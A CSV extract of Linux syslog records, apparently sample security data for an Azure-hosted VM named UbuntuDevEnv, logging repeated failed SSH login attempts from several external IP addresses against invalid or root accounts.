+10566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:23,UbuntuDevEnv,2019-06-25 23:42:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:23,UbuntuDevEnv,2019-06-25 23:42:23,auth,UbuntuDevEnv,info,Invalid user weblogic from 88.247.110.88 port 1593,62331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,88.247.110.8,1593,,
+10568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:23,UbuntuDevEnv,2019-06-25 23:42:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,62331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:23,UbuntuDevEnv,2019-06-25 23:42:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:25,UbuntuDevEnv,2019-06-25 23:42:24,auth,UbuntuDevEnv,info,Failed password for invalid user ronald from 203.195.235.135 port 33754 ssh2,62327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ronald,203.195.235.1,33754,,
+10571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:25,UbuntuDevEnv,2019-06-25 23:42:24,auth,UbuntuDevEnv,info,Failed password for invalid user weblogic from 88.247.110.88 port 1593 ssh2,62331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,88.247.110.8,1593,,
+10572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:25,UbuntuDevEnv,2019-06-25 23:42:25,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 1593:11: Bye Bye [preauth],62331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,1593,,
+10573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:25,UbuntuDevEnv,2019-06-25 23:42:25,auth,UbuntuDevEnv,info,Disconnected from invalid user weblogic 88.247.110.88 port 1593 [preauth],62331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,88.247.110.8,1593,,
+10574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:25,UbuntuDevEnv,2019-06-25 23:42:25,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 33754:11: Bye Bye [preauth],62327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,33754,,
+10575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:25,UbuntuDevEnv,2019-06-25 23:42:25,auth,UbuntuDevEnv,info,Disconnected from invalid user ronald 203.195.235.135 port 33754 [preauth],62327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ronald,203.195.235.1,33754,,
+10576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:43:00,UbuntuDevEnv,2019-06-25 23:43:00,auth,UbuntuDevEnv,info,Invalid user csgoserver from 138.68.12.43 port 44790,62450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,138.68.12.4,44790,,
+10577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:43:00,UbuntuDevEnv,2019-06-25 23:43:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:43:00,UbuntuDevEnv,2019-06-25 23:43:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,62450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:43:02,UbuntuDevEnv,2019-06-25 23:43:02,auth,UbuntuDevEnv,info,Failed password for invalid user csgoserver from 138.68.12.43 port 44790 ssh2,62450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,138.68.12.4,44790,,
+10580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:43:02,UbuntuDevEnv,2019-06-25 23:43:02,auth,UbuntuDevEnv,info,Disconnected from invalid user csgoserver 138.68.12.43 port 44790 [preauth],62450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,138.68.12.4,44790,,
+10581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:43:02,UbuntuDevEnv,2019-06-25 23:43:02,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 44790:11: Bye Bye [preauth],62450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,44790,,
+10582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:43:26,UbuntuDevEnv,2019-06-25 23:43:26,auth,UbuntuDevEnv,info,Invalid user user from 203.195.235.135 port 43038,62547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,203.195.235.1,43038,,
+10583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:43:26,UbuntuDevEnv,2019-06-25 23:43:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:43:26,UbuntuDevEnv,2019-06-25 23:43:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,62547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:43:28,UbuntuDevEnv,2019-06-25 23:43:28,auth,UbuntuDevEnv,info,Failed password for invalid user user from 203.195.235.135 port 43038 ssh2,62547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,203.195.235.1,43038,,
+10586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:43:28,UbuntuDevEnv,2019-06-25 23:43:28,auth,UbuntuDevEnv,info,Disconnected from invalid user user 203.195.235.135 port 43038 [preauth],62547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,203.195.235.1,43038,,
+10587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:43:28,UbuntuDevEnv,2019-06-25 23:43:28,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 43038:11: Bye Bye [preauth],62547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,43038,,
+10588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:03,UbuntuDevEnv,2019-06-25 23:44:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61  user=root,62686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,196.27.127.6,,0,
+10589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:05,UbuntuDevEnv,2019-06-25 23:44:05,auth,UbuntuDevEnv,info,Failed password for root from 196.27.127.61 port 54082 ssh2,62686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,54082,,
+10590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:06,UbuntuDevEnv,2019-06-25 23:44:05,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 54082:11: Bye Bye [preauth],62686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,54082,,
+10591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:06,UbuntuDevEnv,2019-06-25 23:44:05,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 196.27.127.61 port 54082 [preauth],62686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,196.27.127.6,54082,,
+10592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:11,UbuntuDevEnv,2019-06-25 23:44:10,auth,UbuntuDevEnv,info,Invalid user prosper from 88.247.110.88 port 59400,62716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prosper,88.247.110.8,59400,,
+10593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:11,UbuntuDevEnv,2019-06-25 23:44:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,62716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:11,UbuntuDevEnv,2019-06-25 23:44:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:12,UbuntuDevEnv,2019-06-25 23:44:12,auth,UbuntuDevEnv,info,Connection closed by 114.112.81.180 port 48730 [preauth],62710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,48730,,
+10596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:13,UbuntuDevEnv,2019-06-25 23:44:12,auth,UbuntuDevEnv,info,Failed password for invalid user prosper from 88.247.110.88 port 59400 ssh2,62716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prosper,88.247.110.8,59400,,
+10597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:13,UbuntuDevEnv,2019-06-25 23:44:12,auth,UbuntuDevEnv,info,Disconnected from invalid user prosper 88.247.110.88 port 59400 [preauth],62716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prosper,88.247.110.8,59400,,
+10598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:13,UbuntuDevEnv,2019-06-25 23:44:12,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 59400:11: Bye Bye [preauth],62716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,59400,,
+10599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:23,UbuntuDevEnv,2019-06-25 23:44:23,auth,UbuntuDevEnv,info,Invalid user qz from 203.195.235.135 port 52174,62763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qz,203.195.235.1,52174,,
+10600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:23,UbuntuDevEnv,2019-06-25 23:44:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:23,UbuntuDevEnv,2019-06-25 23:44:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,62763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:25,UbuntuDevEnv,2019-06-25 23:44:25,auth,UbuntuDevEnv,info,Failed password for invalid user qz from 203.195.235.135 port 52174 ssh2,62763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qz,203.195.235.1,52174,,
+10603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:25,UbuntuDevEnv,2019-06-25 23:44:25,auth,UbuntuDevEnv,info,Disconnected from invalid user qz 203.195.235.135 port 52174 [preauth],62763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qz,203.195.235.1,52174,,
+10604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:25,UbuntuDevEnv,2019-06-25 23:44:25,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 52174:11: Bye Bye [preauth],62763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,52174,,
+10605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:53,UbuntuDevEnv,2019-06-25 23:44:52,auth,UbuntuDevEnv,info,Invalid user charlie from 131.100.219.3 port 47562,62864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charlie,131.100.219.3,47562,,
+10606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:53,UbuntuDevEnv,2019-06-25 23:44:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:53,UbuntuDevEnv,2019-06-25 23:44:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,62864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+10608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:55,UbuntuDevEnv,2019-06-25 23:44:54,auth,UbuntuDevEnv,info,Failed password for invalid user charlie from 131.100.219.3 port 47562 ssh2,62864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charlie,131.100.219.3,47562,,
+10609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:55,UbuntuDevEnv,2019-06-25 23:44:55,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 47562:11: Bye Bye [preauth],62864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,47562,,
+10610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:44:55,UbuntuDevEnv,2019-06-25 23:44:55,auth,UbuntuDevEnv,info,Disconnected from invalid user charlie 131.100.219.3 port 47562 [preauth],62864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charlie,131.100.219.3,47562,,
+10611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:10,UbuntuDevEnv,2019-06-25 23:45:10,auth,UbuntuDevEnv,info,Invalid user srashid from 138.68.12.43 port 60976,62948,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,srashid,138.68.12.4,60976,,
+10612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:10,UbuntuDevEnv,2019-06-25 23:45:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62948,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:10,UbuntuDevEnv,2019-06-25 23:45:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,62948,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:12,UbuntuDevEnv,2019-06-25 23:45:11,auth,UbuntuDevEnv,info,Failed password for invalid user srashid from 138.68.12.43 port 60976 ssh2,62948,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,srashid,138.68.12.4,60976,,
+10615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:12,UbuntuDevEnv,2019-06-25 23:45:12,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 60976:11: Bye Bye [preauth],62948,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,60976,,
+10616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:12,UbuntuDevEnv,2019-06-25 23:45:12,auth,UbuntuDevEnv,info,Disconnected from invalid user srashid 138.68.12.43 port 60976 [preauth],62948,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,srashid,138.68.12.4,60976,,
+10617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:21,UbuntuDevEnv,2019-06-25 23:45:21,auth,UbuntuDevEnv,info,Invalid user chester from 203.195.235.135 port 33096,63001,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chester,203.195.235.1,33096,,
+10618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:21,UbuntuDevEnv,2019-06-25 23:45:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63001,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:21,UbuntuDevEnv,2019-06-25 23:45:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,63001,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:23,UbuntuDevEnv,2019-06-25 23:45:23,auth,UbuntuDevEnv,info,Failed password for invalid user chester from 203.195.235.135 port 33096 ssh2,63001,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chester,203.195.235.1,33096,,
+10621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:24,UbuntuDevEnv,2019-06-25 23:45:23,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 33096:11: Bye Bye [preauth],63001,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,33096,,
+10622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:24,UbuntuDevEnv,2019-06-25 23:45:23,auth,UbuntuDevEnv,info,Disconnected from invalid user chester 203.195.235.135 port 33096 [preauth],63001,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chester,203.195.235.1,33096,,
+10623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:54,UbuntuDevEnv,2019-06-25 23:45:54,auth,UbuntuDevEnv,info,Connection closed by 114.112.81.180 port 39420 [preauth],63167,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,39420,,
+10624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:55,UbuntuDevEnv,2019-06-25 23:45:54,auth,UbuntuDevEnv,info,Invalid user admin from 88.247.110.88 port 51615,63179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,88.247.110.8,51615,,
+10625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:55,UbuntuDevEnv,2019-06-25 23:45:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
